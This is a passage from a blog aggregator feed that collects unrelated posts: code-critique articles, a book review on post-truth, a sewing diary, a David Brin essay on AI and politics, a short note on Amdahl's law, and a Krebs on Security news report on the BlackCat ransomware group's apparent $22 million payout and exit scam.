	var bitmapString = binaryFormatter.GetString(data);

	return this.formatter.GetBytes(bitmapString);
}

Here's our serialization method. Note how here, the length of the bitmap is either 8 or 16, while previously we were checking all the bits from 64 up to see if it was extended. At first glance, this seemed wrong, but then I realized- data is a byte[]- so 16 bytes is indeed 128 bits.

This gives them the challenging problem of addressing individual bits within this data structure, and they clearly don't know how bitwise operations work, so we get the lovely Math.Pow(2, j) in there.

Ugly, for sure. Unclear, definitely. Which only gets worse when we start unpacking.

public int Unpack(byte[] msg, int offset)
{
	// This is a horribly nasty way of doing the bitmaps, but it works
	// I think...
	var lengthOfBitmap = this.formatter.GetPackedLength(16);
	if (this.formatter is BinaryFormatter)
	{
		if (msg[offset] >= 128)
		{
			lengthOfBitmap += 8;
		}
	}
	else
	{
		if (msg[offset] >= 0x38)
		{
			lengthOfBitmap += 16;
		}
	}

	var bitmapData = new byte[lengthOfBitmap];
	Array.Copy(msg, offset, bitmapData, 0, lengthOfBitmap);

	if (!(this.formatter is BinaryFormatter))
	{
		IFormatter binaryFormatter = new BinaryFormatter();
		var value = this.formatter.GetString(bitmapData);
		bitmapData = binaryFormatter.GetBytes(value);
	}

	// Good luck understanding this.  There be dragons below

	for (var j = 0; j < 8; j++)
	{
		this.bits[i * 8 + j] = (bitmapData[i] & (128 / (int)Math.Pow(2, j))) > 0;
	}

	return offset + lengthOfBitmap;
}

Here, we get our real highlights: the comments. "… but it works… I think…". "Good luck understanding this. There be dragons below."

Now, John wrote this code some time ago. And the thing that I get, when reading this code, is that John was likely somewhat green, and didn't fully understand the problem in front of him or the tools at his disposal to solve it. Further, this was John's independent project, which he was doing to solve a very specific problem- so while the code has problems, I wouldn't heap up too much blame on John for it.

Which, like many other confessional Code Samples-of-the-Day, I'm sharing this because I think it's an interesting learning experience. It's less a "WTF!" and more a, "Oh, man, I see that things went really wrong for you." We all make mistakes, and we all write terrible code from time to time. Credit to John for sharing this mistake.

[Advertisement] Otter - Provision your servers automatically without ever needing to log-in to a command prompt. Get started today!

365 TomorrowsWall

Author: Jeremy Marks One morning an unfamiliar odor filled the air. Sweet at first, the scent soon reeked of rot. It was not a domestic smell but something wild: a floating carpet of flowers a few kilometers offshore. Townsfolk used spyglasses to study a mysterious group of floaters, a floating carpet of uncountable horned plants. […]

The post Wall appeared first on 365tomorrows.

Planet DebianGunnar Wolf: Constructed truths — truth and knowledge in a post-truth world

This post is a review for Computing Reviews for Constructed truths — truth and knowledge in a post-truth world , a book published in Springer Link

Many of us grew up used to having some news sources we could implicitly trust, such as well-positioned newspapers and radio or TV news programs. We knew they would only hire responsible journalists rather than risk diluting public trust and losing their brand’s value. However, with the advent of the Internet and social media, we are witnessing what has been termed the “post-truth” phenomenon. The undeniable freedom that horizontal communication has given us automatically brings with it the emergence of filter bubbles and echo chambers, and truth seems to become a group belief.

Contrary to my original expectations, the core topic of the book is not about how current-day media brings about post-truth mindsets. Instead it goes into a much deeper philosophical debate: What is truth? Does truth exist by itself, objectively, or is it a social construct? If activists with different political leanings debate a given subject, is it even possible for them to understand the same points for debate, or do they truly experience parallel realities?

The author wrote this book clearly prompted by the unprecedented events that took place in 2020, as the COVID-19 crisis forced humanity into isolation and online communication. Donald Trump is explicitly and repeatedly presented throughout the book as an example of an actor that took advantage of the distortions caused by post-truth.

The first chapter frames the narrative from the perspective of information flow over the last several decades, on how the emergence of horizontal, uncensored communication free of editorial oversight started empowering the “netizens” and created a temporary information flow utopia. But soon afterwards, “algorithmic gatekeepers” started appearing, creating a set of personalized distortions on reality; users started getting news aligned to what they already showed interest in. This led to an increase in polarization and the growth of narrative-framing-specific communities that served as echo chambers for disjoint views on reality. This led to the growth of conspiracy theories and, necessarily, to the science denial and pseudoscience that reached unimaginable peaks during the COVID-19 crisis. Finally, when readers decide based on completely subjective criteria whether a scientific theory such as global warming is true or propaganda, or question what most traditional news outlets present as facts, we face the phenomenon known as “fake news.” Fake news leads to “post-truth,” a state where it is impossible to distinguish between truth and falsehood, and serves only a rhetorical function, making rational discourse impossible.

Toward the end of the first chapter, the tone of writing quickly turns away from describing developments in the spread of news and facts over the last decades and quickly goes deep into philosophy, into the very thorny subject pursued by said discipline for millennia: How can “truth” be defined? Can different perspectives bring about different truth values for any given idea? Does truth depend on the observer, on their knowledge of facts, on their moral compass or in their honest opinions?

Zoglauer dives into epistemology, following various thinkers’ ideas on what can be understood as truth: constructivism (whether knowledge and truth values can be learnt by an individual building from their personal experience), objectivity (whether experiences, and thus truth, are universal, or whether they are naturally individual), and whether we can proclaim something to be true when it corresponds to reality. For the final chapter, he dives into the role information and knowledge play in assigning and understanding truth value, as well as the value of second-hand knowledge: Do we really “own” knowledge because we can look up facts online (even if we carefully check the sources)? Can I, without any medical training, diagnose a sickness and treatment by honestly and carefully looking up its symptoms in medical databases?

Wrapping up, while I very much enjoyed reading this book, I must confess it is completely different from what I expected. This book digs much more into the abstract than into information flow in modern society, or the impact on early 2020s politics as its editorial description suggests. At 160 pages, the book is not a heavy read, and Zoglauer’s writing style is easy to follow, even across the potentially very deep topics it presents. Its main readership is not necessarily computing practitioners or academics. However, for people trying to better understand epistemology through its expressions in the modern world, it will be a very worthy read.

Planet DebianValhalla's Things: Jeans, step two. And three. And four.

Posted on March 7, 2024
Tags: madeof:atoms, FreeSoftWear

A woman wearing a regular pair of slim-cut black denim jeans.

I was working on what looked like a good pattern for a pair of jeans-shaped trousers, and I knew I wasn’t happy with 200-ish g/m² cotton-linen for general use outside of deep summer, but I didn’t have a source for proper denim either (I had been low-key looking for it for a long time).

Then one day I looked at an article I had saved about fabric shops that sell technical fabric and while window-shopping on one I found that they had a decent selection of denim in a decent weight.

I decided it was a sign, and decided to buy the two heaviest denim they had: a 100% cotton, 355 g/m² one and a 97% cotton, 3% elastane at 385 g/m² 1; the latter was a bit of compromise as I shouldn’t really be buying fabric adulterated with the Scourge of Humanity, but it was heavier than the plain one, and I may be having a thing for tightly fitting jeans, so this may be one of the very few woven fabric where I’m not morally opposed to its existence.

And, I’d like to add, I resisted buying any of the very nice wools they also seem to carry, other than just a couple of samples.

Since the shop only sold in 1 meter increments, and I needed about 1.5 meters for each pair of jeans, I decided to buy 3 meters per type, and have enough to make a total of four pair of jeans. A bit more than I strictly needed, maybe, but I was completely out of wearable day-to-day trousers.

a cardboard box with neatly folded black denim, covered in semi-transparent plastic.

The shop sent everything very quickly, the courier took their time (oh, well) but eventually delivered my fabric on a sunny enough day that I could wash it and start as soon as possible on the first pair.

The pattern I did in linen was a bit too fitting, but I was afraid I had widened it a bit too much, so I did the first pair in the 100% cotton denim. Sewing them took me about a week of early mornings and late afternoons, excluding the weekend, and my worries proved false: they were mostly just fine.

The only bit that could have been a bit better is the waistband, which is a tiny bit too wide on the back: it’s designed to be so for comfort, but the next time I should pull the elastic a bit more, so that it stays closer to the body.

The same from the back, showing the applied pockets with a sewn logo.

I wore those jeans daily for the rest of the week, and confirmed that they were indeed comfortable and the pattern was ok, so on the next Monday I started to cut the elastic denim.

I decided to cut and sew two pairs, assembly-line style, using the shaped waistband for one of them and the straight one for the other one.

I started working on them on a Monday, and on that week I had a couple of days when I just couldn’t, plus I completely skipped sewing on the weekend, but on Tuesday the next week one pair was ready and could be worn, and the other one only needed small finishes.

A woman wearing another pair of jeans; the waistband here is shaped to fit rather than having elastic.

And I have to say, I’m really, really happy with the ones with a shaped waistband in elastic denim, as they fit even better than the ones with a straight waistband gathered with elastic. Cutting it requires more fabric, but I think it’s definitely worth it.

But it will be a problem for a later time: right now three pairs of jeans are a good number to keep in rotation, and I hope I won’t have to sew jeans for myself for quite some time.

A plastic bag with mid-sized offcuts of denim; there is a 30 cm ruler on top that is just wider than the bag

I think that the leftovers of plain denim will be used for a skirt or something else, and as for the leftovers of elastic denim, well, there aren’t a lot left, but what else I did with them is the topic for another post.

Thanks to the fact that they are all slightly different, I’ve started to keep track of the times when I wash each pair, and hopefully I will be able to see whether the elastic denim is significantly less durable than the regular, or the added weight compensates for it somewhat. I’m not sure I’ll manage to remember about saving the data until they get worn, but if I do it will be interesting to know.

Oh, and I say I’ve finished working on jeans and everything, but I still haven’t sewn the belt loops to the third pair. And I’m currently wearing them. It’s a sewist tradition, or something. :D


  1. The links are to the shop for Italy; you can copy the “Codice prodotto” and look for it on one of the shop version for other countries (where they apply the right vat etc., but sadly they don’t allow to mix and match those settings and the language).↩︎

,

David BrinThe futility of hiding. And then a brief rant!

Just back from an important conference (in Panama) about ways to ensure that the looming tsunami of Artificial Intelligences will become and remain 'beneficial.' Few endeavors could be more important... and as you might guess, I have some concepts on-offer that you'll find nowhere else. Alas, literally  nowhere else. Even though they merely apply only the same tools we used to make an increasingly beneficial society, the last 200 years.

More on that later. Meanwhile... first off, since it's much in the news... want to see what the Apple Vision Pro will turn into within a few years? Watch this video trailer for my novel Existence. predicting where it'll go.

And while we're on prophecies.... This is deeply worrisome... and almost exactly overlaps with my "Probationers" in Sundiver! Back in 1978. Not a joke or a satire.

"Justice Minister Arif Virani has defended a new power in the online harms bill to impose house arrest on someone who is feared to commit a hate crime in the future – even if they have not yet done so already. The person could be made to wear an electronic tag, if the attorney-general requests it, or ordered by a judge to remain at home, the bill says."

But don't worry! The government won't misuse this power! Trust us!


== The Futility of Hiding ==

One purpose for the "Beneficial AGI Conference"  - (and I believe the stream will be up, soon) - was seeking ways to evade the worst and most persistent errors of the past.


Take the classic approach to human civilization - a pyramidal power structure dominated by brutal males, of the kind that ruled 99% of human societies - and many despotisms today. We are all descended from those harems. Onlynow, new tools of techno;logy might empower a return to such pyramidal stupidity, making such abusive power vasty more effective and oppressive than when it was enforced by mere swords.


Such a tech rich extension of despotisd was depicted by George Orwell utilizing total panopticon surveillance for control, of course without any reciprocal sousveillance purview from below. In fact, I doubt George O. ever considered even the possibility. But Orwell's novel would lead to very different outcomes if every member of 'the party' had every moment watched reciprocally by the prols! (The reciprocoal accountability that I prescribed in The Transparent Society.


General transparency might, possibly, prevent the worst aspects of Big Brother. But there are ways that lateral light might also go badly. For example when - as in the PRC - "social credit" system, that is used to let a conformist majority harass and bully dissident minorities or even eccentricity, enforcing homogeneity, as we saw predicted in Ray Bradbury's Fahrenheit 451.


This will be exacerbated by AI, if we aren't careful, since such systems will be able to sieve inputs across the entire internet and all camera systems, as portrayed in "Person of Interest."  While that TV series depicted many worrisome aspects, it also pointed toward the one thing that might offer us a soft landing, as there were two competing AI systems that tended to cancel out each others' worst traits.

I have found it very strange that almost none of the conferences and zoom meetings about AI that I've watched or participated in has ever even mentioned that secret sauce. (Though I do, here in WIRED.)


Instead, there are relentless, hand-wringing discussions about disagreements between "policy wonks' and nerdy tech geeks over how to design regulations to limit bad AI outcomes... and never any allowance for the fact that these changes will happen at an accelerating pace, leaving even our most agile regulators behind, mere ape-humans grasping after answers like a tree sloth. 


Or else... what generally happens at many sincere conferences on "AI ethics," we see a relentless chain of hippie-sounding pleadings and "shoulds," without any clue how to do actually enforce preachy 'ethics' on a new ecosystem where all of the attractor states currently draw towards predation..


In Foundation's Triumph I explored the implications of embedded "deep-ethical-programming" regulations - including Isaac Asimov's "three laws of robotics," revealing the inevitable result. Even if you succeed in emplanting truly genetic-level codes of behavior, the result will be that super-uber intelligent systems will simply become... lawyers, and find ways around every limitation. Unless...


...unless they are caught and constrained by other lawyers who are able to keep up. This is exactly the technique that allowed us to limit the power of elites, to end 6000 years of feudalism and launch upon our 240 year Periclean enlightenment experiment... by flattening power structures and forcing elite entities to compete with one another.


It is only the exact method prescribed by Adam Smith, by the US framers and by every generation of reformers since. And it is utterly ignored in every single AI/internet discussion or conference I have ever watched or attended.


If AI are destined to outpace us, then one potential solution is to flatten the playing field and get distinctly different AIs competing with each other, especially tattling on flaws and/or predations or malevolent or even unpleasant behaviors.


It is exactly what we have done for 250 years... and it is the one approach that is never, ever, and I mean ever discussed. Almost as if there is a mental block against admitting or even noticing the obvious.



== Don’t try to hide!”

Your DNA can be pulled from thin air: Reinforcing a point I’ve been pushing since the 1990s, in The Transparent Society and elsewhere, that hiding is not the way to preserve privacy, there are the shrill cries that new generative AI systems may decipher and interpret our personal DNA! Only – as illustrated in the film Gattaca – that DNA is already everywhere. You shed it in flakes of skin wherever you go. There is a better way to prevent your data being used against you. By aggressively ripping the veils away from malefactors who might do that sort of thing! 


And by this point, the only folks reading any longer are likely AIs... So, time to get self-indulgent with a temper tantrum!



== And now... that rant I promised! ==


I sometimes store things for posting and lose the link. But here's a quotation worth answering:

"Alas, we have TWO wars against the Enlightenment raging, one from the reactionary right and the other from the postmodern faux marxist wannabe totalitarian Red Guards on the left."

Bah! One of these lethal threats is real, but not because of MAGA. Those tens of millions of confederate ground troops are -- like numbskulls in all the previous 7 phases of our recurring US Civil War -- merely riled-up mobs, responding to dog whistles and hatred of minorities and nerds.  They are brownshirt tools of the real owners of today's GOP ... a few thousand oligarchs who are now desperately afraid. 

What do theose masters -- here and abroad -- fear most? You can see it in the only priorities pushed by their servants in Congress:

They dread full-funding of the IRS. And a return to effective rooseveltean social contracts, replacing the great Supply Side ripoff-scam. They fear a return to what works, what created the post WWII middle class. What could block feudalism's long planned return.  And let's be clear, when Republicans control a chamber of the US Congress, preserving Supply Side and eviscerating the IRS are their ONLY legislative priorities. All the rest is fervid, potemkin preening.

Who are they? An alliance of petro princes, casino mafiosi, "ex" Kremlin commissars, supposed marxist mandarins, hedge lords, inheritance brats... Trace it... sharing one goal. One common foe. The worldwide caste of skilled, middle class knowledge professionals. 

They are ALL waging all-out war vs ALL fact using professions, from science and teaching, medicine and law and civil service to the heroes of the FBI/Intel/Military officer corps who won the Cold War and the War on terror. 


== BOTH sides do it? ==

But the left?  The LEFT is just as bad?  
The what? 
Where in God's name does this shill get this crap about "postmodern faux marxist wannabe totalitarian Red Guards on the left." ???

Yes. Yes, today's FAR left CONTAINS some fact-allergic, troglodyte-screeching dogmatists who wage war on science and hate the American tradition of steady, pragmatic reform, and who would impose their prescribed morality on you.   

But today’s mad ENTIRE right CONSISTS of fact-allergic, troglodyte-screeching dogmatists who wage war on science and hate the American tradition of steady, pragmatic reform, and who would impose their prescribed morality on you.     

There is all the world’s difference between FAR and ENTIRE.  As there is between CONTAINS and CONSISTS.  One lunatic mob owns and operates an entire US political party, waging open war against minorities, races, genders, even the concept of equal protection under the law. But above all (as I said) pouring hate upon the nerdy fact professionals who stand in their way, blocking their path back to feudal power. 

The other pack of dopes? A few thousand jibbering campus twerps? San Fran zippies? Yowlers who are largely ignored by the one party of pragmatic problem solvers that remains in U.S. political life.

Sure, Foxites howl about 'woke'. But ask any of them... even the worst campus PC bullies (and though shrill, they are deemed jokes, even on campus). Ask them about Marx!  You'll find that the indignant ignoramuses could not paraphrase even the simplest cliché about old Karl. Their ignorance is almost as profound as their utter ineptitude and irrelevance. Except as excuses for tirades on Fox, they are of no relevance at all.

What is relevant is NERDS!  All nerds stand in the way of re-imposed feudalism. The folks who keep civilization going. The ones who know cyber, bio, nuclear, chem and every other dual use power-tech. And that is why Fox each day rails against them, far more often than any race or gender!

Want a pattern? Again, let me reiterate. Ask your MAGAs or right-elite friends to explain that cult's all-out war vs ALL fact using professions, from science and teaching, medicine and law and civil service to the heroes of the FBI/Intel/Military officer corps who won the Cold War and the War on terror. 

Cryptogram Friday Squid Blogging: New Plant Looks Like a Squid

Newly discovered plant looks like a squid. And it’s super weird:

The plant, which grows to 3 centimetres tall and 2 centimetres wide, emerges to the surface for as little as a week each year. It belongs to a group of plants known as fairy lanterns and has been given the scientific name Relictithismia kimotsukiensis.

Unlike most other plants, fairy lanterns don’t produce the green pigment chlorophyll, which is necessary for photosynthesis. Instead, they get their energy from fungi.

As usual, you can also use this squid post to talk about the security stories in the news that I haven’t covered.

Read my blog posting guidelines here.

Planet DebianSteinar H. Gunderson: Reverse Amdahl's Law

Everybody working in performance knows Amdahl's law, and it is usually framed as a negative result; if you optimize (in most formulations, parallelize) a part of an operation, you gain diminishing results after a while. (When optimizing a given fraction p of the total time T by a speedup factor s, the new time taken is (1-p)T + pT/s.)

However, Amdahl's law also works beautifully in reverse! When you optimize something, there's usually some limit where a given optimization isn't worth it anymore; I usually put this around 1% or so, although of course it varies with the cost of the optimization and such. (Most people would count 1% as ridiculously low, but it's usually how mature systems go; you rarely find single 30% speedups, but you can often find ten smaller speedups and apply them sequentially. SQLite famously tripled their speed by chaining optimizations so tiny that they needed to run in a simulator to measure them.) And as your total runtime becomes smaller, things that used to not be worth it now pop over that threshold! If you have enough developer resources and no real upper limit for how much performance you would want, you can keep going forever.

A different way to look at it is that optimizations give you compound interest; if measuring in terms of throughput instead of latency (i.e., items per second instead of seconds per item), which I contend is the only reasonable way to express performance percentages, you can simply multiply the factors together.[1] So 1% and then 1% means 1.01 * 1.01 = 1.0201 = 2.01% speedup and not 2%. Thirty 1% optimizations sum to 34.8%, not 30%.

So here's my formulation of Amdahl's law, in a more positive light: The more you speed up a given part of a system, the more impactful optimizations in the other parts will be. So go forth and fire up those profilers :-)

[1] Obviously throughput measurements are inappropriate if what you care about is e.g. 99p latency. It is still better to talk about a 50% speedup than removing 33% of the latency, though, especially as the speedup factor gets higher.

Worse Than FailureRepresentative Line: A String of Null Thinking

Today's submitter identifies themselves as pleaseKillMe, which hey, c'mon buddy. Things aren't that bad. Besides, you shouldn't let the bad code you inherit drive you to depression- it should drive you to revenge.

Today's simple representative line is one that we share because it's not just representative of our submitter's code base, but one that shows up surprisingly often.

SELECT * FROM users WHERE last_name='NULL'

Now, I don't think this particular code impacted Mr. Null, but it certainly could have. That's just a special case of names being hard.

In this application, last_name is a nullable field. They could just store a NULL, but due to data sanitization issues, they stored 'NULL' instead- a string. NULL is not 'NULL', and thus- we've got a lot of 'NULL's that may have been intended to be NULL, but also could be somebody's last name. At this point, we have no way to know.

[Advertisement] Otter - Provision your servers automatically without ever needing to log-in to a command prompt. Get started today!

365 TomorrowsOne More Story

Author: J.D. Rice “I remember them.” My hand moves the candle with perfect precision, carefully transferring the exothermic reaction from its wick to that of the taller candle in front of me. The combustion thus spread, I place the first candle back in its holder. The first time I copied this technique, my human master […]

The post One More Story appeared first on 365tomorrows.

Krebs on SecurityBlackCat Ransomware Group Implodes After Apparent $22M Payment by Change Healthcare

There are indications that U.S. healthcare giant Change Healthcare has made a $22 million extortion payment to the infamous BlackCat ransomware group (a.k.a. “ALPHV“) as the company struggles to bring services back online amid a cyberattack that has disrupted prescription drug services nationwide for weeks. However, the cybercriminal who claims to have given BlackCat access to Change’s network says the crime gang cheated them out of their share of the ransom, and that they still have the sensitive data Change reportedly paid the group to destroy. Meanwhile, the affiliate’s disclosure appears to have prompted BlackCat to cease operations entirely.

Image: Varonis.

In the third week of February, a cyber intrusion at Change Healthcare began shutting down important healthcare services as company systems were taken offline. It soon emerged that BlackCat was behind the attack, which has disrupted the delivery of prescription drugs for hospitals and pharmacies nationwide for nearly two weeks.

On March 1, a cryptocurrency address that security researchers had already mapped to BlackCat received a single transaction worth approximately $22 million. On March 3, a BlackCat affiliate posted a complaint to the exclusive Russian-language ransomware forum Ramp saying that Change Healthcare had paid a $22 million ransom for a decryption key, and to prevent four terabytes of stolen data from being published online.

The affiliate claimed BlackCat/ALPHV took the $22 million payment but never paid him his percentage of the ransom. BlackCat is known as a “ransomware-as-service” collective, meaning they rely on freelancers or affiliates to infect new networks with their ransomware. And those affiliates in turn earn commissions ranging from 60 to 90 percent of any ransom amount paid.

“But after receiving the payment ALPHV team decide to suspend our account and keep lying and delaying when we contacted ALPHV admin,” the affiliate “Notchy” wrote. “Sadly for Change Healthcare, their data [is] still with us.”

Change Healthcare has neither confirmed nor denied paying, and has responded to multiple media outlets with a similar non-denial statement — that the company is focused on its investigation and on restoring services.

Assuming Change Healthcare did pay to keep their data from being published, that strategy seems to have gone awry: Notchy said the list of affected Change Healthcare partners they’d stolen sensitive data from included Medicare and a host of other major insurance and pharmacy networks.

On the bright side, Notchy’s complaint seems to have been the final nail in the coffin for the BlackCat ransomware group, which was infiltrated by the FBI and foreign law enforcement partners in late December 2023. As part of that action, the government seized the BlackCat website and released a decryption tool to help victims recover their systems.

BlackCat responded by re-forming, and increasing affiliate commissions to as much as 90 percent. The ransomware group also declared it was formally removing any restrictions or discouragement against targeting hospitals and healthcare providers.

However, instead of responding that they would compensate and placate Notchy, a representative for BlackCat said today the group was shutting down and that it had already found a buyer for its ransomware source code.

The seizure notice now displayed on the BlackCat darknet website.

“There’s no sense in making excuses,” wrote the RAMP member “Ransom.” “Yes, we knew about the problem, and we were trying to solve it. We told the affiliate to wait. We could send you our private chat logs where we are shocked by everything that’s happening and are trying to solve the issue with the transactions by using a higher fee, but there’s no sense in doing that because we decided to fully close the project. We can officially state that we got screwed by the feds.”

BlackCat’s website now features a seizure notice from the FBI, but several researchers noted that this image seems to have been merely cut and pasted from the notice the FBI left in its December raid of BlackCat’s network. The FBI has not responded to requests for comment.

Fabian Wosar, head of ransomware research at the security firm Emsisoft, said it appears BlackCat leaders are trying to pull an “exit scam” on affiliates by withholding many ransomware payment commissions at once and shutting down the service.

“ALPHV/BlackCat did not get seized,” Wosar wrote on Twitter/X today. “They are exit scamming their affiliates. It is blatantly obvious when you check the source code of their new takedown notice.”

Dmitry Smilyanets, a researcher for the security firm Recorded Future, said BlackCat’s exit scam was especially dangerous because the affiliate still has all the stolen data, and could still demand additional payment or leak the information on his own.

“The affiliates still have this data, and they’re mad they didn’t receive this money, Smilyanets told Wired.com. “It’s a good lesson for everyone. You cannot trust criminals; their word is worth nothing.”

BlackCat’s apparent demise comes closely on the heels of the implosion of another major ransomware group — LockBit, a ransomware gang estimated to have extorted over $120 million in payments from more than 2,000 victims worldwide. On Feb. 20, LockBit’s website was seized by the FBI and the U.K.’s National Crime Agency (NCA) following a months-long infiltration of the group.

LockBit also tried to restore its reputation on the cybercrime forums by resurrecting itself at a new darknet website, and by threatening to release data from a number of major companies that were hacked by the group in the weeks and days prior to the FBI takedown.

But LockBit appears to have since lost any credibility the group may have once had. After a much-promoted attack on the government of Fulton County, Ga., for example, LockBit threatened to release Fulton County’s data unless paid a ransom by Feb. 29. But when Feb. 29 rolled around, LockBit simply deleted the entry for Fulton County from its site, along with those of several financial organizations that had previously been extorted by the group.

Fulton County held a press conference to say that it had not paid a ransom to LockBit, nor had anyone done so on their behalf, and that they were just as mystified as everyone else as to why LockBit never followed through on its threat to publish the county’s data. Experts told KrebsOnSecurity LockBit likely balked because it was bluffing, and that the FBI likely relieved them of that data in their raid.

Smilyanets’ comments are driven home in revelations first published last month by Recorded Future, which quoted an NCA official as saying LockBit never deleted the data after being paid a ransom, even though that is the only reason many of its victims paid.

“If we do not give you decrypters, or we do not delete your data after payment, then nobody will pay us in the future,” LockBit’s extortion notes typically read.

Hopefully, more companies are starting to get the memo that paying cybercrooks to delete stolen data is a losing proposition all around.

,

Cory DoctorowCatch me at San Francisco Public Library on Mar 13, discussing my new novel “The Bezzle” with Robin Sloan!

A pair of black and white photos of me and Robin Sloan, with the cover of my novel 'The Bezzle' between us. It's captioned 'Author: Cory Doctorow, The Bezzle, in conversation with Robin Sloan.'

At long last, the San Francisco stop of the book tour for my new novel The Bezzle has been finalized: I’ll be at the San Francisco Public Library Main Branch on Wednesday, March 13th, in conversation with Robin Sloan!

The event starts at 6PM with Cooper Quintin from the Electronic Frontier Foundation, talking about the real horrors of the prison-tech industry, which I fictionalize in The Bezzle.

Attentive readers will know that this event was finalized very late in the day, and it’s going to need a little help, given the short timeline. Please consider coming – and be sure to tell your Bay Area friends about the gig!

Wednesday, 3/13/2024
6:00 – 7:30
Koret Auditorium
Main Library
100 Larkin Street
San Francisco, CA 94102

Worse Than FailureCodeSOD: Moving in a Flash

It's a nearly universal experience that the era of our youth and early adulthood is where we latch on to for nostalgia. In our 40s, the music we listened to in our 20s is the high point of culture. The movies we watched represent when cinema was good, and everything today sucks.

And, based on the sheer passage of calendar time, we have a generation of adults whose nostalgia has latched onto Flash. I've seen many a thinkpiece lately, waxing rhapsodic about the Flash era of the web. I'd hesitate to project a broad cultural trend from that, but we're roughly about the right time in the technology cycle that I'd expect people to start getting real nostalgic for Flash. And I'll be honest: Flash enabled some interesting projects.

Of course, Flash also gave us Flex, and I'm one of the few people old enough to remember when Oracle tried to put their documentation into a Flex based site from which you could not copy and paste. That only lasted a few months, thankfully, but as someone who was heavily in the Oracle ecosystem at the time, it was a terrible few months.

In any case, long ago, CW inherited a Flash-based application. Now, Flash, like every UI technology, has a concept of "containers"- if you put a bunch of UI widgets inside a container, their positions (default) to being relative to the container. Move the container, and all the contents move too. I think we all find this behavior pretty obvious.

CW's co-worker did not. Here's how they handled moving a bunch of related objects around:

public function updateKeysPosition(e:MouseEvent):void{
			if(dragging==1){
			theTextField.x=catButtonArray[0].x-100;
			theTextField.y=catButtonArray[0].y-200;
			catButtonArray[1].x=catButtonArray[0].x-InitalKeyBoxWidth/2+keyWidth/2+10;
			catButtonArray[1].y=catButtonArray[0].y-InitalKeyBoxHeight/2+keyHeight/2+40;
			
			catButtonArray[2].x=catButtonArray[0].x-InitalKeyBoxWidth/2+keyWidth/2+10+keyWidth;
			catButtonArray[2].y=catButtonArray[0].y-InitalKeyBoxHeight/2+keyHeight/2+40;
			catButtonArray[3].x=catButtonArray[0].x-InitalKeyBoxWidth/2+keyWidth/2+10+keyWidth*2;
			catButtonArray[3].y=catButtonArray[0].y-InitalKeyBoxHeight/2+keyHeight/2+40;
			catButtonArray[4].x=catButtonArray[0].x-InitalKeyBoxWidth/2+keyWidth/2+10+keyWidth*3;
			catButtonArray[4].y=catButtonArray[0].y-InitalKeyBoxHeight/2+keyHeight/2+40;
			catButtonArray[5].x=catButtonArray[0].x-InitalKeyBoxWidth/2+keyWidth/2+10+keyWidth*4;
			catButtonArray[5].y=catButtonArray[0].y-InitalKeyBoxHeight/2+keyHeight/2+40;
			catButtonArray[6].x=catButtonArray[0].x-InitalKeyBoxWidth/2+keyWidth/2+10+keyWidth*5;
			catButtonArray[6].y=catButtonArray[0].y-InitalKeyBoxHeight/2+keyHeight/2+40;
			catButtonArray[7].x=catButtonArray[0].x-InitalKeyBoxWidth/2+keyWidth/2+10+keyWidth*6;
			catButtonArray[7].y=catButtonArray[0].y-InitalKeyBoxHeight/2+keyHeight/2+40;
			catButtonArray[8].x=catButtonArray[0].x-InitalKeyBoxWidth/2+keyWidth/2+10+keyWidth*7;
			catButtonArray[8].y=catButtonArray[0].y-InitalKeyBoxHeight/2+keyHeight/2+40;
			catButtonArray[9].x=catButtonArray[0].x-InitalKeyBoxWidth/2+keyWidth/2+10+keyWidth*8;
			catButtonArray[9].y=catButtonArray[0].y-InitalKeyBoxHeight/2+keyHeight/2+40;
			catButtonArray[10].x=catButtonArray[0].x-InitalKeyBoxWidth/2+keyWidth/2+10+keyWidth*9;
			catButtonArray[10].y=catButtonArray[0].y-InitalKeyBoxHeight/2+keyHeight/2+40;
			
			catButtonArray[11].x=catButtonArray[0].x-InitalKeyBoxWidth/2+keyWidth/2+30;
			catButtonArray[11].y=catButtonArray[0].y-InitalKeyBoxHeight/2+keyHeight/2+110;
			catButtonArray[12].x=catButtonArray[0].x-InitalKeyBoxWidth/2+keyWidth/2+30+keyWidth;
			catButtonArray[12].y=catButtonArray[0].y-InitalKeyBoxHeight/2+keyHeight/2+110;
			catButtonArray[13].x=catButtonArray[0].x-InitalKeyBoxWidth/2+keyWidth/2+30+keyWidth*2;
			catButtonArray[13].y=catButtonArray[0].y-InitalKeyBoxHeight/2+keyHeight/2+110;
			catButtonArray[14].x=catButtonArray[0].x-InitalKeyBoxWidth/2+keyWidth/2+30+keyWidth*3;
			catButtonArray[14].y=catButtonArray[0].y-InitalKeyBoxHeight/2+keyHeight/2+110;
			catButtonArray[15].x=catButtonArray[0].x-InitalKeyBoxWidth/2+keyWidth/2+30+keyWidth*4;
			catButtonArray[15].y=catButtonArray[0].y-InitalKeyBoxHeight/2+keyHeight/2+110;
			catButtonArray[16].x=catButtonArray[0].x-InitalKeyBoxWidth/2+keyWidth/2+30+keyWidth*5;
			catButtonArray[16].y=catButtonArray[0].y-InitalKeyBoxHeight/2+keyHeight/2+110;
			catButtonArray[17].x=catButtonArray[0].x-InitalKeyBoxWidth/2+keyWidth/2+30+keyWidth*6;
			catButtonArray[17].y=catButtonArray[0].y-InitalKeyBoxHeight/2+keyHeight/2+110;
			catButtonArray[18].x=catButtonArray[0].x-InitalKeyBoxWidth/2+keyWidth/2+30+keyWidth*7;
			catButtonArray[18].y=catButtonArray[0].y-InitalKeyBoxHeight/2+keyHeight/2+110;
			catButtonArray[19].x=catButtonArray[0].x-InitalKeyBoxWidth/2+keyWidth/2+30+keyWidth*8;
			catButtonArray[19].y=catButtonArray[0].y-InitalKeyBoxHeight/2+keyHeight/2+110;
			
			catButtonArray[20].x=catButtonArray[0].x-InitalKeyBoxWidth/2+keyWidth/2+60;
			catButtonArray[20].y=catButtonArray[0].y-InitalKeyBoxHeight/2+keyHeight/2+180;
			catButtonArray[21].x=catButtonArray[0].x-InitalKeyBoxWidth/2+keyWidth/2+60+keyWidth;
			catButtonArray[21].y=catButtonArray[0].y-InitalKeyBoxHeight/2+keyHeight/2+180;
			catButtonArray[22].x=catButtonArray[0].x-InitalKeyBoxWidth/2+keyWidth/2+60+keyWidth*2;
			catButtonArray[22].y=catButtonArray[0].y-InitalKeyBoxHeight/2+keyHeight/2+180;
			catButtonArray[23].x=catButtonArray[0].x-InitalKeyBoxWidth/2+keyWidth/2+60+keyWidth*3;
			catButtonArray[23].y=catButtonArray[0].y-InitalKeyBoxHeight/2+keyHeight/2+180;
			catButtonArray[24].x=catButtonArray[0].x-InitalKeyBoxWidth/2+keyWidth/2+60+keyWidth*4;
